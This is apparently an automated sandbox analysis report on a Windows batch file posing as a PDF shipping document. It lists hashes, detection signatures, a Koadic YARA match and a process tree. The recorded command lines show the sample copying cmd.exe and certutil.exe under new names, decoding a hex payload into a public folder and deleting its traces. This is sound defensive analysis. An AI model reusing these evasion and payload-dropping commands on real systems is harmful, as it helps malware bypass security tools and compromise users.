Windows Analysis Report
1x40 CONTAINER.PDF-.bat

Overview

General Information

Sample name:1x40 CONTAINER.PDF-.bat
Analysis ID:1569105
MD5:91f00c06e8cc61fe9239eefdb0dd0c03
SHA1:d37a062f52f67920062bc5c6bf67a846ac431e9e
SHA256:c155d1fac78a328deb5fc50e3a779cb1210abdbb22fea06dfcdeea93e5d1fa7e
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Drops PE files to the user root directory
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found large BAT file
Registers a new ROOT certificate
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 7412 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 7508 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7532 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 7544 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7568 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7584 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 7616 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7632 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 7664 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7688 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
Source: 1x40 CONTAINER.PDF-.bat
Rule: MALWARE_BAT_KoadicBAT
Description: Koadic post-exploitation framework BAT payload
Author: ditekSHen
Strings:
  • 0x2:$s1: &@cls&@set
  • 0x59:$s2: :~57,1%%
  • 0x64:$s2: :~50,1%%
  • 0x6f:$s2: :~44,1%%
  • 0x7a:$s2: :~39,1%%
  • 0x85:$s2: :~4,1%
  • 0x96:$s2: :~46,1%%
  • 0xa1:$s2: :~15,1%%
  • 0xac:$s2: :~49,1%%
  • 0xb7:$s2: :~0,1%%
  • 0xc1:$s2: :~37,1%%
  • 0xcc:$s2: :~42,1%%
  • 0xd7:$s2: :~23,1%%
  • 0xe2:$s2: :~40,1%%
  • 0xed:$s2: :~19,1%%
  • 0xf8:$s2: :~60,1%%
  • 0x103:$s2: :~4,1%%
  • 0x10d:$s2: :~47,1%%
  • 0x118:$s2: :~56,1%%
  • 0x123:$s2: :~35,1%%
  • 0x12e:$s2: :~39,1%%

System Summary

Source: Process started
Author: Florian Roth (Nextron Systems), Tim Shelton
Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7412, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7532, ProcessName: alpha.exe

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 7532, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7544, ProcessName: extrac32.exe
No Suricata rule has matched

Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F2C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,7_2_00007FF6AA1F2C2C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F2F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF6AA1F2F38
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2EEB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,7_2_00007FF6AA2EEB38
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2ACBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,7_2_00007FF6AA2ACBB4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20CB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,7_2_00007FF6AA20CB98
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B0B9C CryptHashData,GetLastError,#357,7_2_00007FF6AA2B0B9C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA280B80 NCryptCreatePersistedKey,#205,#359,#359,#357,7_2_00007FF6AA280B80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B0BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,7_2_00007FF6AA2B0BF4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA282BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6AA282BC0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6C30 NCryptOpenStorageProvider,#360,7_2_00007FF6AA2B6C30
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA21CC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,7_2_00007FF6AA21CC24
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B8C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,7_2_00007FF6AA2B8C58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA280C3C NCryptExportKey,#205,#359,#359,#357,7_2_00007FF6AA280C3C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1E6C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,7_2_00007FF6AA1E6C4C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA28ACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,7_2_00007FF6AA28ACAC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA274CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6AA274CA0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6C88 NCryptEnumAlgorithms,#360,7_2_00007FF6AA2B6C88
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C4C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,7_2_00007FF6AA2C4C80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA282C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,7_2_00007FF6AA282C80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2D8CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,7_2_00007FF6AA2D8CF4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6CE0 NCryptEnumStorageProviders,#360,7_2_00007FF6AA2B6CE0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA244CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,7_2_00007FF6AA244CC0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6D2C NCryptFreeBuffer,#360,7_2_00007FF6AA2B6D2C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA242D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF6AA242D18
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA280D14 NCryptFinalizeKey,#205,#357,#357,7_2_00007FF6AA280D14
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA282CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,7_2_00007FF6AA282CFC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA272CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,7_2_00007FF6AA272CF8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20C960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF6AA20C960
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA288940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,7_2_00007FF6AA288940
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA28C940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,7_2_00007FF6AA28C940
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA28099C BCryptOpenAlgorithmProvider,#205,#359,#359,7_2_00007FF6AA28099C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2429A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF6AA2429A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B2994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,7_2_00007FF6AA2B2994
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2BA9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF6AA2BA9F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA24E9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,7_2_00007FF6AA24E9F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA264A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,7_2_00007FF6AA264A34
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA284A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,7_2_00007FF6AA284A1C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA280A18 BCryptSetProperty,#205,#359,#357,#357,7_2_00007FF6AA280A18
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26AA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,7_2_00007FF6AA26AA00
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA288AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6AA288AA0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F6A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,7_2_00007FF6AA1F6A84
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,7_2_00007FF6AA26EA7C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B2A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,7_2_00007FF6AA2B2A78
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA282AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,7_2_00007FF6AA282AE4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA280ABC BCryptVerifySignature,#205,#357,#357,#357,#357,7_2_00007FF6AA280ABC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA278AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF6AA278AFC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA222B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,7_2_00007FF6AA222B00
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AEF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA2AEF74
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA270F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,7_2_00007FF6AA270F58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA264F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF6AA264F50
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA280FB4 NCryptOpenKey,#205,#359,#357,#357,7_2_00007FF6AA280FB4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6FAC BCryptOpenAlgorithmProvider,#360,7_2_00007FF6AA2B6FAC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA214F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,7_2_00007FF6AA214F90
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA279028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,7_2_00007FF6AA279028
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F7034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,7_2_00007FF6AA1F7034
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA28301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6AA28301C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF6AA1F302F
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA287020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6AA287020
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B700C BCryptEnumAlgorithms,#360,7_2_00007FF6AA2B700C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA281058 NCryptOpenStorageProvider,#205,#359,#357,7_2_00007FF6AA281058
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B705C BCryptGetProperty,#360,7_2_00007FF6AA2B705C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA28B0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6AA28B0A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA24B098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,7_2_00007FF6AA24B098
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA22107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,7_2_00007FF6AA22107C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2810D8 NCryptSetProperty,#205,#359,#357,#359,#357,7_2_00007FF6AA2810D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2830D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF6AA2830D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B70C8 BCryptSetProperty,#360,7_2_00007FF6AA2B70C8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA239134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,7_2_00007FF6AA239134
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B7124 BCryptGenerateKeyPair,#360,7_2_00007FF6AA2B7124
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2A511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,7_2_00007FF6AA2A511C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B2DAC #357,#357,CryptFindOIDInfo,LocalFree,7_2_00007FF6AA2B2DAC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA282D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF6AA282D78
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6D78 NCryptOpenKey,#360,7_2_00007FF6AA2B6D78
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA280D84 NCryptFreeObject,#205,#357,7_2_00007FF6AA280D84
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6DE0 NCryptCreatePersistedKey,#360,7_2_00007FF6AA2B6DE0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA264DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF6AA264DDC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2A8DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,7_2_00007FF6AA2A8DD0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA280DD4 NCryptGetProperty,#205,#359,#357,#359,#357,7_2_00007FF6AA280DD4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2D0DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,7_2_00007FF6AA2D0DB8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA210E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA210E24
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA282E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,7_2_00007FF6AA282E6C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C4E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,7_2_00007FF6AA2C4E58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6E48 NCryptSetProperty,#360,7_2_00007FF6AA2B6E48
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6EA8 NCryptImportKey,#360,7_2_00007FF6AA2B6EA8
